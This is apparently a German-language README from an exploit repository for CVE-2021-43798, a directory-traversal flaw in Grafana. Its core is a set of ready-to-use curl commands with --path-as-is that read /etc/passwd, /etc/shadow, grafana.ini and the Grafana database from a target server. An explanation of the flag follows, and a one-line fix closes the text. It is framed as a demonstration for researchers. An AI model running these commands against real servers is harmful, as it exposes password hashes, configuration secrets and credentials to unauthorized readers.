
Exploit für CVE-2021-43798, eine Grafana-Verzeichnisdurchlauf-Schwachstelle, die nicht authentifizierte beliebige Dateiauslesungen mittels präparierter curl-Befehle ermöglicht.
Dieses Repository demonstriert die Ausnutzung von CVE-2021-43798, einer Directory-Traversal-Schwachstelle in Grafana. Diese Schwachstelle erlaubt es Angreifern, beliebige Dateien auf dem Server zu lesen.
Um die Schwachstelle manuell auszunutzen, können Sie einen der folgenden curl-Befehle verwenden, um zu versuchen, sensible Dateien zu lesen:
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../Users/install.txt"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/passwd"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/grafana/grafana.ini"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../var/lib/grafana/grafana.db"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/hostname"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/shadow"
Im Zusammenhang mit der Ausnutzung der Grafana CVE-2021-43798 Directory-Traversal-Schwachstelle ist die Option --path-as-is unerlässlich, da sie es ermöglicht, die speziell konstruierten Traversal-Sequenzen (../../../../../) ohne Änderung direkt an den Server zu senden. Dies kann dazu führen, dass auf sensible Dateien auf dem Server zugegriffen wird, die sich außerhalb des vorgesehenen Verzeichnisses befinden.
Ohne --path-as-is würde curl den Pfad möglicherweise zu etwas wie /public/plugins/Users/install.txt normalisieren, was die Schwachstelle nicht ausnutzen würde. Durch die Verwendung von --path-as-is bleibt die genaue Traversal-Sequenz erhalten, sodass der Exploit erfolgreich ist.
Weitere Details zur Option --path-as-is finden Sie in der curl-Dokumentation. Durch das Verständnis und die Nutzung von --path-as-is können Sicherheitsexperten und Forscher Directory-Traversal-Schwachstellen in Webanwendungen effektiv demonstrieren und testen.
Um diese Schwachstelle zu beheben, aktualisieren Sie Grafana auf Version 8.3.1 oder höher.